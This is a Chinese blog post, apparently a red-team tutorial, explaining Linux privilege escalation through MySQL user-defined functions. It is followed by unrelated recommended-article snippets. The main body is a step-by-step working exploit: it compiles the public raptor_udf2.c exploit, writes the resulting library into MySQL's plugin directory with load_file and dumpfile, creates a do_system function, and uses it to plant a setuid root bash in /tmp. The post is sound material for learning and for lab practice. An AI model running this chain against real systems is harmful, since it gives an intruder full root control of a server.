Linux提权精讲(二)Mysql udf提权

已于 2024-12-14 22:48:22 修改
阅读量1.1k 收藏 30
点赞数 10
文章标签: linux mysql 运维 网络安全 安全
于 2024-12-14 22:47:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Hush78/article/details/144477115
版权

该文章Mysql udf提权适用于 Mysql >= 5.1,请各位注意版本号后再进行尝试!

什么是Mysql udf提权?

Mysql udf 提权就是利用 Mysql 允许用户自定义函数的机制进行提权。

“udf” 也就是 User Defiend Function,用户自定义函数。在Mysql数据库中,允许用户自定义创建自己的函数,这些函数可以在SQL查询中使用。通过使用自定义函数,使用者可以更加简便的进行数据库的查询等操作。

Mysql udf 提权条件:

(1)secure_file_priv为空或正好设置的路径为我们所需要导入的路径。这一点是最关键也是决定我们能否利用udf进行提取。因为secure_file_priv决定了我们是否有上传文件等操作的权限,其中限制了load_file(),select ....... into outfile,load date 等函数的权限。因此当secure_file_priv 为空时其也就表示了可以对任意路径进行操作。

mysql> show variables like '%secure_file_priv%';

若secure_file_priv的值被设置为 /var/lib/mysql-files/,则表示只能在指定目录 /var/lib/mysql-files/ 下进行文件的操作。

(2)拥有Mysql数据库的用户,该用户需要对Mysql拥有 Insert、create、delete等操作权限,最好是直接以root账户

提权步骤:

(1)准备好利用文件

我们可以先利用searchsploite查询mysql udf提权可利用的文件,我们可以利用其中的 1518.c 文件作为提权的脚本

将利用脚本下载下来当作备用,将其改名字为 raptor_udf2.c

(2)我们可以查看 raptor_udf2.c 脚本文件,里面有脚本文件利用的方法步骤

我们可以按照脚本里的利用方法对其进行利用

(3)利用php建立临时web服务器,将脚本文件传输到靶机中,接着开始按照步骤一步步开始利用

(4)具体命令讲解

gcc -g -c raptor_udf2.c -fPIC

1、-g:表示会生成调试信息,使得你在调试器中调试编译后的程序。生成的调试信息包含源代码行号、局部变量、局部和全局变量信息等

2、-c:这个是选项表示编译器仅编译源代码,不进行链接。编译器会生成一个目标文件,通常有 .o 的拓展名。这对于将多个源文件分别编译成目标文件,然后链接为一个可执行文件程序或库很有用。

3、-fPIC:这表示生成位置无关代码。这种代码可以在内存中的任何位置执行。

gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

1、-g:表示会生成调试信息,使得你在调试器中调试编译后的程序。生成的调试信息包含源代码行号、局部变量、局部和全局变量信息等

2、-share:这个指示编译器生成一个共享库文件,而不是一个可执行文件。共享库允许多个程序共享相同的库代码,从而减少了程序的大小和内存占用

3、-Wl:该选项会告诉编译器将后面的选项传递给链接器。在这里它用于传递 -soname,raptor_udf2.so 选项

4、-soname,raptor_udf2.so:这个选项设置了生成共享库的共享对象名称。soname 是一个简短的标识符,用于在运行时链接器解析共享库依赖关系时引用该数据库。通常,soname 包括主版本号,以便在升级库时保持二进制的兼容性。

5、-o raptor_udf2.so:指定输出了文件名称,即生成的文件共享库名称。

6、-lc:这个选项告诉链接器链接 C 标准库。

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/raptor_udf2.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

create function do_system returns integer soname 'raptor_udf2.so';

其中需要特别注意的是 /usr/lib/mysql/plugin/raptor_udf2.so 文件的路径位置,因为不同版本号的数据库可能路径有不同的差别,因此需要我们特别查询进行文件构造

执行udf:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

我们可以看到其属主和属组均属于root,并且我们有s位的权限,因此我们执行bash后会获得root的权限

提权:

/tmp/rootbash -p

提权成功

Mysql udf 提权总结:

通过Mysql允许用户自定义函数,以更高级的权限自定义一些能够执行的系统命令的函数,然后导入mysql数据库中,通过数据库去以高权限执行系统命令,获得提权。

参考内容:「红队笔记」Linux提权精讲:演示1 - 服务漏洞利用提权,以MySQL-UDF提权为例_哔哩哔哩_bilibili

高薪程序员&面试题精讲系列99之如何对数据库进行优化()
一一哥
05-16 657
一. 面试题及剖析 1. 今日面试题 如何对数据库进行优化? 说说你是怎么进行数据库优化的? 2. 题目剖析 壹哥在前面用了十几篇文章来讲解数据库相关的面试题,比如SELECT查询关键字的执行顺序、存储引擎种类及区别、索引的种类及失效等,这些面试题都是我们面试时的高频题目。但关于数据库,还有一个必考的题目,那就是关于数据库的优化方案!这个题目,壹哥要求各位必须牢牢掌握,这是100%必问的一道题目,如果这个题目你回答的不好,那面试官肯定认为你数据库知识储备的不够扎实! 壹哥之所以要在这之前,写
MATLAB算法实战应用案例精讲-【人工智能】同态加密(概念篇)(附python和MATLAB代码实现)
qq_36130719的博客
08-18 668
同态加密是数据加密方式的一种,特点是允许数据在加密情况下实现数学或者逻辑运算,对密文直接进行处理得到的结果和对明文进行处理再加密得到的结果相同,即“先加密后计算”和“先计算再加密”效果是一样的。同态加密优势在于用户在数据加密的情形下仍能对特定的加密数据进行分析和检索,高了数据处理的效率,保证了数据安全传送,并且正确的加密数据仍能得到正确的解密结果。由于这个良好的性质,企业和个人可以委托第三方对数据进行处理而不泄露信息,进而实现了数据的“可用不可见”。
Linuxmysql UDF
waxcj的博客
12-16 2418
linux mysql数据库
Linuxlinux mysql udf(十五)
最新发布
2303_78851087的博客
02-25 482
Linuxlinux mysql udf(十五)
linux环境下的MySQL UDF
黑战士的博客
04-25 2277
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞的时候发现补丁全部被修补。这个时候需要利用第三方应用。当MYSQL限比较高的时候我们就可以利用udf。###利用前mysqlfuncfunc。
linux——Mysql UDF
qq_55202378的博客
04-12 908
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
Linux利用UDF库实现Mysql
12-15
环境: os:linux(bt5)   database:mysql   简述: 通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。   要求:  在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;   过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令 1,得到插件库路径 mysql> show variables like "%plugin%"; +---------------+-----------------------+ |
mysql udf_mysql——udf
weixin_39958025的博客
12-05 184
01前言udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system限。02思路1.将udf文件上传到指定位置sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,...
mysql udf
weixin_60719780的博客
03-16 1595
udf只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们需要使用这个16进制的udf.dll文件;
MysqlUDF
热门推荐
总有人间一两风,填我十万八千梦
11-07 2万+
udf通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql限 —> 系统限。限制条件挺多,如下先获取mysql限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的限,即secure_file_priv的值为空。
Flink - 尚硅谷- 大数据高级 Flink 技术精讲 - 1
MiaoSO的博客
08-24 4232
Flink - 尚硅谷- 大数据高级 Flink 技术精讲 Flink - 尚硅谷- 大数据高级 Flink 技术精讲 一、Flink 简介 、Quick Start 2.1 环境 2.1 Flink 安装包 2.2 nc 2.3 pom 配置 2.2 批处理 2.3 流处理 三、Flink 部署 3.1 Standalone 模式 3.2 Yarn 模式 3.2.1 Flink on Yarn 3.2.2 Session Cluster 3.2.3 Per Job Cluster
Flink - 尚硅谷- 大数据高级 Flink 技术精讲 - 2
MiaoSO的博客
08-24 1066
七、Flink 时间语义与 Watermark 7.1 Flink 中的时间语义 7.2 设置 Event Time 7.3 水位线 - Watermark 7.3.1 基本概念 7.3.2 WaterMark 传递 7.3.3 WaterMark 注意点 7.3.4 Watermark Demo 八、ProcessFunction API(底层 API) 8.1 KeyedProcessFunction 和 定时器(Timers) 8.2 侧输出流(SlideOutput) 8.3 CoP.
文件系统之格式化与挂载
yonggeit的博客
04-25 5548
文件系统 定义 文件系统类型 Linux 文件系统 光盘iso9660 Windows fat32 ntfs Unix FFS fast UFS unix JFS2 网络文件系统NFS CIFS 集群文件系统GFS2 OCFS2 oracle 分布式文件系统 RAW 未经处理或者未经格式化产生的文件系统 根据其是否支持journal 功能  日志型文件系统 ext3 ext4 xfs 非日志
MySQL UDF
m0_68636078的博客
09-22 1578
自用
MySQLUDF
2301_76227305的博客
06-08 2724
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
mysql_udf
qq_42383069的博客
03-05 3364
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入限 连接大马,测试下当前我们的限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此
linux mysql udf
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 1037
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值